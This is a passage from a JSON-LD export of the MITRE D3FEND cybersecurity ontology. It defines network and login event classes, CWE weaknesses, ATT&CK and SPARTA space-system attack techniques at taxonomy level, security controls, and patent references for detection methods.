          "@id": "d3f:UserGeolocationLogonPatternAnalysis"
        }
      ],
      "d3f:kb-reference-title": "System, method, and computer program product for detecting and assessing security risks in a network",
      "rdfs:label": "Reference - System, method, and computer program product for detecting and assessing security risks in a network - Exabeam Inc"
    },
    {
      "@id": "d3f:PhysicalLinkConnectEvent",
      "@type": "owl:Class",
      "d3f:definition": "The medium is attached or the port is enabled, establishing electrical or optical continuity so that link negotiation can begin.",
      "rdfs:label": "Physical Link Connect Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalLinkEvent"
        },
        {
          "@id": "_:N41c4d9f402c04d7eaf4fdcbb280df169"
        }
      ]
    },
    {
      "@id": "_:N41c4d9f402c04d7eaf4fdcbb280df169",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:precedes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLinkUpEvent"
      }
    },
    {
      "@id": "d3f:kb-reference",
      "@type": "owl:ObjectProperty",
      "owl:inverseOf": {
        "@id": "d3f:kb-reference-of"
      },
      "rdfs:label": "kb-reference",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-object-property"
      },
      "skos:altLabel": "has-technique-reference"
    },
    {
      "@id": "d3f:may-produce",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x may-produce y: The entity x may produce the thing y; that is, 'x produces y' may be true.",
      "rdfs:label": "may-produce",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:CWE-520",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-520",
      "d3f:definition": "Allowing a .NET application to run at potentially escalated levels of access to the underlying operating and file systems can be dangerous and result in various forms of attacks.",
      "rdfs:label": ".NET Misconfiguration: Use of Impersonation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-266"
      }
    },
    {
      "@id": "d3f:T1567.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1567.002",
      "d3f:definition": "Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetEncryptedWebTraffic"
      },
      "rdfs:label": "Exfiltration to Cloud Storage",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1567"
        },
        {
          "@id": "_:N6b9d58d65e394641aee5d7667ab6b4fb"
        }
      ]
    },
    {
      "@id": "_:N6b9d58d65e394641aee5d7667ab6b4fb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetEncryptedWebTraffic"
      }
    },
    {
      "@id": "d3f:CWE-205",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-205",
      "d3f:definition": "The product's behaviors indicate important differences that may be observed by unauthorized actors in a way that reveals (1) its internal state or decision process, or (2) differences from other products with equivalent functionality.",
      "rdfs:label": "Observable Behavioral Discrepancy",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-203"
      }
    },
    {
      "@id": "d3f:RegressionAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-RA",
      "d3f:definition": "Regression analysis is a set of statistical processes for estimating the relationships between a dependent variable (often called the 'outcome' or 'response' variable, or a 'label' in machine learning parlance) and one or more independent variables (often called 'predictors', 'covariates', 'explanatory variables' or 'features').",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Regression analysis. [Link](https://en.wikipedia.org/wiki/Regression_analysis)",
      "rdfs:label": "Regression Analysis",
      "rdfs:subClassOf": {
        "@id": "d3f:StatisticalMethod"
      }
    },
    {
      "@id": "d3f:LoginSession",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computing, a login session is the period of activity between a user logging in and logging out of a (multi-user) system. This includes local login sessions, where a user has direct physical access to a computer, as well as domain login sessions, where a user logs into a computer that is part of a network domain.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Login_session"
      },
      "rdfs:label": "Login Session",
      "rdfs:seeAlso": {
        "@id": "https://learn.microsoft.com/en-us/windows-server/security/windows-authentication/windows-logon-scenarios"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Session"
      },
      "skos:altLabel": "Logon Session"
    },
    {
      "@id": "d3f:IA-0009.01",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0009.01",
      "d3f:definition": "Missions frequently depend on distributed teams, instrument builders at universities, science operations centers, and international partners, connected by data portals, shared repositories, and federated credentials. A compromise of a collaborator yields access to telescience networks, analysis pipelines, instrument commanding tools, and file exchanges that deliver ephemerides, calibration products, procedures, or configuration tables into mission workflows. Partners may operate their own ground elements or payload gateways under delegated authority, creating additional entry points whose authentication and logging differ from the prime’s. Initial access emerges when attacker-modified artifacts or commands traverse these sanctioned paths: a revised calibration script uploaded through a science portal, a configuration table promoted by a cross-org CI job, or a payload task submitted via a collaboration queue and forwarded by the prime as routine work. Variations in process rigor, identity proofing, and toolchains across institutions amplify the attacker’s options while preserving the appearance of legitimate partner activity.",
      "rdfs:label": "Mission Collaborator (academia, international, etc.) - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0009/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0009"
      },
      "skos:prefLabel": "Mission Collaborator (academia, international, etc.)"
    },
    {
      "@id": "d3f:NetworkConnectionListenEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a network endpoint begins listening for new network connections.",
      "rdfs:label": "Network Connection Listen Event",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkConnectionEvent"
      }
    },
    {
      "@id": "d3f:may-execute",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x may-execute y: The subject x may take the action of carrying out (executing) y, which is a single software module, function, or instruction.",
      "rdfs:label": "may-execute",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:Host-basedFirewall",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A software firewall which controls network inbound and outbound network traffic to the host computer.",
      "rdfs:label": "Host-based Firewall",
      "rdfs:subClassOf": {
        "@id": "d3f:SystemSoftware"
      }
    },
    {
      "@id": "d3f:DE-0009",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0009",
      "d3f:definition": "The adversary exploits the physical and operational environment to reduce detectability or to mislead observers. Tactics include signature management (minimizing RF/optical/thermal/RCS), controlled emissions timing, deliberate power-down/dormancy, geometry choices that hide within clutter or eclipse, and the deployment of decoys that generate convincing tracks. CCD can also leverage naturally noisy conditions, debris-rich regions, auroral radio noise, solar storms, to mask proximity operations or to provide plausible alternate explanations for anomalies. The unifying theme is environmental manipulation: shape what external sensors perceive so surveillance and attribution lag, misclassify, or look elsewhere.",
      "rdfs:label": "Camouflage, Concealment, and Decoys (CCD) - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0009/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTADefenseEvasionTechnique"
      },
      "skos:prefLabel": "Camouflage, Concealment, and Decoys (CCD)"
    },
    {
      "@id": "d3f:T1027.012",
      "@type": "owl:Class",
      "d3f:attack-id": "T1027.012",
      "d3f:definition": "Adversaries may smuggle commands to download malicious payloads past content filters by hiding them within otherwise seemingly benign windows shortcut files. Windows shortcut files (.LNK) include many metadata fields, including an icon location field (also known as the `IconEnvironmentDataBlock`) designed to specify the path to an icon file that is to be displayed for the LNK file within a host directory.",
      "rdfs:label": "LNK Icon Smuggling",
      "rdfs:subClassOf": {
        "@id": "d3f:T1027"
      }
    },
    {
      "@id": "d3f:may-disable",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "may-disable",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-evict"
      }
    },
    {
      "@id": "d3f:T1134.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1134.003",
      "d3f:copies": {
        "@id": "d3f:AccessToken"
      },
      "d3f:creates": {
        "@id": "d3f:LoginSession"
      },
      "d3f:definition": "Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the `LogonUser` function.(Citation: LogonUserW function) The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread.",
      "d3f:may-modify": {
        "@id": "d3f:EventLog"
      },
      "rdfs:label": "Make and Impersonate Token",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1134"
        },
        {
          "@id": "_:Nb28aa3d110574a09895cbad4cf803c7d"
        },
        {
          "@id": "_:N0461c960a2fb49f6b5cfff9ca8381e5f"
        },
        {
          "@id": "_:N6aa09ef4e61749f5afb26116b23e31b6"
        }
      ]
    },
    {
      "@id": "_:Nb28aa3d110574a09895cbad4cf803c7d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:copies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessToken"
      }
    },
    {
      "@id": "_:N0461c960a2fb49f6b5cfff9ca8381e5f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LoginSession"
      }
    },
    {
      "@id": "_:N6aa09ef4e61749f5afb26116b23e31b6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLog"
      }
    },
    {
      "@id": "d3f:T1414",
      "@type": "owl:Class",
      "d3f:attack-id": "T1414",
      "d3f:definition": "Adversaries may abuse clipboard manager APIs to obtain sensitive information copied to the device clipboard. For example, passwords being copied and pasted from a password manager application could be captured by a malicious application installed on the device.(Citation: Fahl-Clipboard)",
      "rdfs:label": "Clipboard Data - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileCollectionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileCredentialAccessTechnique"
        }
      ],
      "skos:prefLabel": "Clipboard Data"
    },
    {
      "@id": "d3f:ChildProcess",
      "@type": "owl:Class",
      "d3f:definition": "A child process in computing is a process created by another process (the parent process). This technique pertains to multitasking operating systems, and is sometimes called a subprocess or traditionally a subtask. There are two major procedures for creating a child process: the fork system call (preferred in Unix-like systems and the POSIX standard) and the spawn (preferred in the modern (NT) kernel of Microsoft Windows, as well as in some historical operating systems).",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Child_process"
      },
      "rdfs:label": "Child Process",
      "rdfs:seeAlso": {
        "@id": "dbr:Parent_process"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:ATTACKMobileImpactTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0034"
      },
      "rdfs:label": "Impact Technique - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTechnique"
        },
        {
          "@id": "_:N7ccfa08190544be8a80716a6cb135003"
        }
      ],
      "skos:prefLabel": "Impact Technique"
    },
    {
      "@id": "_:N7ccfa08190544be8a80716a6cb135003",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0034"
      }
    },
    {
      "@id": "d3f:AuthenticationLog",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A log of authentication events.",
      "d3f:records": {
        "@id": "d3f:Authentication"
      },
      "rdfs:label": "Authentication Log",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Authorization"
        },
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/00155053-n"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EventLog"
        },
        {
          "@id": "_:N982daca6e5534558af063ead745d3699"
        }
      ]
    },
    {
      "@id": "_:N982daca6e5534558af063ead745d3699",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:records"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authentication"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-2_6",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Account Management | Dynamic Privilege Management",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-2(6)"
    },
    {
      "@id": "d3f:TA0032",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Discovery - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Discovery"
    },
    {
      "@id": "d3f:EX-0014.04",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0014.04",
      "d3f:definition": "The adversary transmits GNSS-like signals (or manipulates crosslink-distributed time/ephemeris) so the spacecraft’s navigation solution reflects attacker-chosen states. With believable code phases, Doppler, and navigation messages, the victim can be pulled to a false position/velocity/time, causing downstream functions, attitude pointing limits, station visibility prediction, eclipse timing, antenna pointing, and anti-replay windows, to misbehave. Even when GNSS is not the primary navigation source, spoofed PNT can bias timekeeping or seed filters that fuse multiple sensors, leading to mis-scheduling and errant control. The defining feature is externally provided navigation/time that passes validity checks yet encodes a crafted trajectory or epoch.",
      "d3f:spoofs": {
        "@id": "d3f:GNSSSignal"
      },
      "rdfs:label": "Position, Navigation, and Timing (PNT) Spoofing - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0014/04/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0014"
        },
        {
          "@id": "_:N6e979034e0f74164a4cb02189b3efd0f"
        }
      ],
      "skos:prefLabel": "Position, Navigation, and Timing (PNT) Spoofing"
    },
    {
      "@id": "_:N6e979034e0f74164a4cb02189b3efd0f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:spoofs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GNSSSignal"
      }
    },
    {
      "@id": "d3f:CCI-002605_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization installs security-relevant software updates within an organization-defined time period of the release of the updates.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SoftwareUpdate"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002605"
    },
    {
      "@id": "d3f:Reference-MethodAndSystemForDetectingExternalControlOfCompromisedHosts_VECTRANETWORKSInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US9407647B2/en?oq=US-9407647-B2"
      },
      "d3f:kb-abstract": "A detection engine may be implemented by receiving network traffic and processing the traffic into one or more session datasets. Sessions not initiated by an internal host may be discarded. The frequency between the communication packets from the internal host to external host may be grouped or processed into rapid-exchange instances. The number of rapid-exchange instances, the time intervals between them, and/or the rhythm and directions of the initiation of the instances may be analyzed to determine that a human actor is manually controlling the external host. In some embodiments, when it is determined that only one human actor is involved, alarm data may be generated that indicates that a network intrusion involving manual remote control has occurred or is underway.",
      "d3f:kb-author": "Nicolas BEAUCHESNE; Ryan James PRENGER",
      "d3f:kb-mitre-analysis": "This patent describes detecting an external attacker taking remote control of an internal host. Detection includes identifying sessions where the external host controls the internal host in the opposite direction the session was initiated. The number of rapid-exchange communication instances (i.e, communications that occur between the two hosts with little silence gap), the time intervals between them, and/or the rhythm and direction of the instances, are analyzed to determine if an external human actor is manually controlling the internal host.",
      "d3f:kb-organization": "VECTRA NETWORKS Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:RemoteTerminalSessionDetection"
      },
      "d3f:kb-reference-title": "Method and system for detecting external control of compromised hosts",
      "rdfs:label": "Reference - Method and system for detecting external control of compromised hosts - VECTRA NETWORKS Inc"
    },
    {
      "@id": "d3f:CWE-69",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-69",
      "d3f:definition": "The product does not properly prevent access to, or detect usage of, alternate data streams (ADS).",
      "rdfs:label": "Improper Handling of Windows ::DATA Alternate Data Stream",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-66"
      }
    },
    {
      "@id": "d3f:PhysicalLinkErrorDisableEvent",
      "@type": "owl:Class",
      "d3f:definition": "The device automatically disables the link in response to fault conditions such as excessive faults or signal degradation.",
      "rdfs:label": "Physical Link Error Disable Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalLinkEvent"
        },
        {
          "@id": "_:N90134d00a7d5494a90a67694be8d95df"
        }
      ]
    },
    {
      "@id": "_:N90134d00a7d5494a90a67694be8d95df",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLinkDownEvent"
      }
    },
    {
      "@id": "d3f:T1518",
      "@type": "owl:Class",
      "d3f:attack-id": "T1518",
      "d3f:definition": "Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
      "rdfs:label": "Software Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:NTFSSymbolicLink",
      "@type": "owl:Class",
      "d3f:definition": "An NTFS symbolic link records the path of another file that the links contents should show. Can accept relative paths. SMB networking (UNC path) and directory support added in NTFS 3.1.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:NTFS_links"
      },
      "rdfs:label": "NTFS Symbolic Link",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NTFSLink"
        },
        {
          "@id": "d3f:SymbolicLink"
        }
      ],
      "skos:altLabel": "NTFS Symlink"
    },
    {
      "@id": "d3f:T1203",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1203",
      "d3f:definition": "Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.",
      "d3f:modifies": [
        {
          "@id": "d3f:ProcessCodeSegment"
        },
        {
          "@id": "d3f:StackFrame"
        }
      ],
      "rdfs:label": "Exploitation for Client Execution",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionTechnique"
        },
        {
          "@id": "_:N87108f2bcdd44593ae66742e5a29fbf9"
        },
        {
          "@id": "_:N9951e1d4d2a0480a966482d5360fc3d1"
        }
      ]
    },
    {
      "@id": "_:N87108f2bcdd44593ae66742e5a29fbf9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessCodeSegment"
      }
    },
    {
      "@id": "_:N9951e1d4d2a0480a966482d5360fc3d1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:StackFrame"
      }
    },
    {
      "@id": "d3f:T1569.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1569.001",
      "d3f:definition": "Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)",
      "rdfs:label": "Launchctl",
      "rdfs:subClassOf": {
        "@id": "d3f:T1569"
      }
    },
    {
      "@id": "d3f:Vehicle",
      "@type": "owl:Class",
      "d3f:definition": "A vehicle is a machine designed for self-propulsion, usually to transport people, cargo, or both.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Vehicle"
      },
      "rdfs:label": "Vehicle",
      "rdfs:subClassOf": {
        "@id": "d3f:PhysicalArtifact"
      }
    },
    {
      "@id": "d3f:Reference-MethodForDetectingAnomaliesInTimeSeriesDataProducedByDevicesOfAnInfrastructureInANetwork",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/CA3191230A1/"
      },
      "d3f:kb-abstract": "The present invention relates to a method for detecting anomalies in time series data produced by devices of an infrastructure in a network comprising, for each of the devices through computerized data processing means, retrieving a time series data for the device in the network, extracting a plurality of time series samples relating to respective time windows and having a predefined window size and a predefined stride, by sliding the time windows to overlap the time series data, supplying the time series samples as input to a Convolutional Autoencoder to define reconstructed time series values having a predefined percentile intervals, analysing the reconstructed time series values to identify anomalous behaviours of the time series data, signalling an anomaly of the device when at least one anomalous behaviour is identified.",
      "d3f:kb-organization": "Nozomi Networks",
      "d3f:kb-reference-of": {
        "@id": "d3f:RemoteFirmwareUpdateMonitoring"
      },
      "d3f:kb-reference-title": "Method for detecting anomalies in time series data produced by devices of an infrastructure in a network",
      "rdfs:label": "Reference - Method for detecting anomalies in time series data produced by devices of an infrastructure in a network"
    },
    {
      "@id": "d3f:IA-0013",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0013",
      "d3f:definition": "The inverse of \"IA-0006: Compromise Hosted Payload\", this technique describes adversaries that are targeting a hosted payload; the host space vehicle (SV) can serve as an initial access vector to compromise the payload through vulnerabilities in the SV's onboard systems, communication interfaces, or software. If the SV's command and control systems are exploited, an attacker could gain unauthorized access to the vehicle's internal network. Once inside, the attacker may laterally move to the hosted payload, particularly if it shares data buses, processors, or communication links with the vehicle.",
      "rdfs:label": "Compromise Host Spacecraft - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0013/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAInitialAccessTechnique"
      },
      "skos:prefLabel": "Compromise Host Spacecraft"
    },
    {
      "@id": "d3f:CWE-773",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-773",
      "d3f:definition": "The product does not properly maintain references to a file descriptor or handle, which prevents that file descriptor/handle from being reclaimed.",
      "rdfs:label": "Missing Reference to Active File Descriptor or Handle",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-771"
      }
    },
    {
      "@id": "d3f:OTReadCommand",
      "@type": "owl:Class",
      "d3f:definition": "Read or retrieve data.",
      "rdfs:comment": [
        "BACnet: confirmedCOVNotification\nBACnet: subscribeCOV\nBACnet: atomicReadFile\nBACnet: readProperty\nBACnet: readPropertyConditional\nBACnet: readPropertyMultiple\nBACnet: unconfirmedCOVNotification\nBACnet: readRange\nBACnet: subscribeCOVProperty\nBACnet: getEventInformation\nBACnet: subscribe-cov-property-multiple\nBACnet: confirmed-cov-notification-multiple\nBACnet: unconfirmed-cov-notification-multiple ",
        "CIP: Get Attributes All\nCIP: Get Attribute List\nCIP: Get Attribute Single\nCIP: Find Next Object Instance\nCIP: Get Member ",
        "GE-SRTP: READ SYSTEM MEMORY\nGE-SRTP: READ TASK MEMORY ",
        "Modbus: Read Coils\nModbus: Read Discrete Inputs\nModbus: Read Holding Registers\nModbus: Read Input Registers\nModbus: Read File Record\nModbus: Read FIFO Queue"
      ],
      "rdfs:label": "OT Read Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTProcessDataCommand"
      }
    },
    {
      "@id": "d3f:CWE-185",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-185",
      "d3f:definition": "The product specifies a regular expression in a way that causes data to be improperly matched or compared.",
      "rdfs:label": "Incorrect Regular Expression",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-697"
      }
    },
    {
      "@id": "d3f:ParametricTests",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PT",
      "d3f:definition": "A parametric test relies upon the assumption that the data you want to test is (or approximately is) normally distributed.",
      "d3f:kb-article": "## References\nNewcastle University. (n.d.). Parametric Hypothesis Tests. [Link](https://www.ncl.ac.uk/webtemplate/ask-assets/external/maths-resources/psychology/parametric-hypothesis-tests.html)",
      "rdfs:label": "Parametric Tests",
      "rdfs:subClassOf": {
        "@id": "d3f:HypothesisTesting"
      }
    },
    {
      "@id": "d3f:RegistryKeyDeletion",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RegistryKeyDeletion"
      ],
      "d3f:d3fend-id": "D3-RKD",
      "d3f:definition": "Delete a registry key.",
      "d3f:deletes": {
        "@id": "d3f:WindowsRegistryKey"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CybersecurityIncidentandVulnerabilityResponsePlaybooks"
      },
      "rdfs:label": "Registry Key Deletion",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ObjectEviction"
        },
        {
          "@id": "_:N2cb141a1bdc749228362324b30dfbd9d"
        }
      ]
    },
    {
      "@id": "_:N2cb141a1bdc749228362324b30dfbd9d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:deletes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryKey"
      }
    },
    {
      "@id": "d3f:IA-0005",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0005",
      "d3f:definition": "Adversaries may execute a sequence of orbital maneuvers to co-orbit and approach a target closely enough for local sensing, signaling, or physical interaction. Proximity yields advantages that are difficult to achieve from Earth: high signal-to-noise for interception, narrowly targeted interference or spoofing, observation of attitude/thermal behavior, and, if interfaces exist, opportunities for mechanical mating. The approach typically unfolds through phasing, far-field rendezvous, relative navigation (e.g., vision, lidar, crosslink cues), and closed-loop final approach. At close distances, an attacker can monitor side channels, stimulate acquisition beacons, test crosslinks, or prepare for contact operations (capture or docking).",
      "rdfs:label": "Rendezvous & Proximity Operations - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0005/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAInitialAccessTechnique"
      },
      "skos:prefLabel": "Rendezvous & Proximity Operations"
    },
    {
      "@id": "d3f:Email",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An email, or email message, is a document that is sent between computer users across computer networks.",
      "d3f:may-contain": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "d3f:URL"
        }
      ],
      "rdfs:label": "Email",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Email"
        },
        {
          "@id": "https://schema.ocsf.io/objects/email"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DocumentFile"
        },
        {
          "@id": "_:N6b5214f12550426daf8aae0cdf1f3dea"
        },
        {
          "@id": "_:Nd423e759c0ea4e9b813c1e94a61ea0f2"
        }
      ]
    },
    {
      "@id": "_:N6b5214f12550426daf8aae0cdf1f3dea",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "_:Nd423e759c0ea4e9b813c1e94a61ea0f2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:URL"
      }
    },
    {
      "@id": "d3f:Autoencoding",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-AUT",
      "d3f:definition": "Autoencoders are a specific type of deep learning architecture used for learning representations of data, typically for the purpose of dimensionality reduction. This is achieved by designing a deep learning architecture that aims at copying its input layer at its output layer.",
      "d3f:kb-article": "## References\nSOCR. (n.d.). ABIDE Autoencoder. [Link](https://socr.umich.edu/HTML5/ABIDE_Autoencoder/#:~:text=In%20simple%20words%2C%20autoencoders%20are,layer%20at%20its%20output%20layer.)",
      "rdfs:label": "Autoencoding",
      "rdfs:subClassOf": {
        "@id": "d3f:DimensionReduction"
      }
    },
    {
      "@id": "d3f:Reference-RPCCallInterception_CrowdstrikeInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20150163109"
      },
      "d3f:kb-abstract": "A service proxy is described herein. The service proxy is configured to act as an intermediary between a client and a service. The service proxy may observe communications, modify communications, log communications, or the like, particularly so as to enhance the security and reliability of the host device. In some implementations, the service proxy may cooperate with an operating system to take over a named port object. In some implementations, the service proxy may receive messages as an intermediary between the client and the server. In some implementations, the service proxy may attach to a shared memory to intercept communications. In some implementations, the service proxy may be injected into a client process to appear to be the client itself.",
      "d3f:kb-author": "Ion-Alexandru Ionescu",
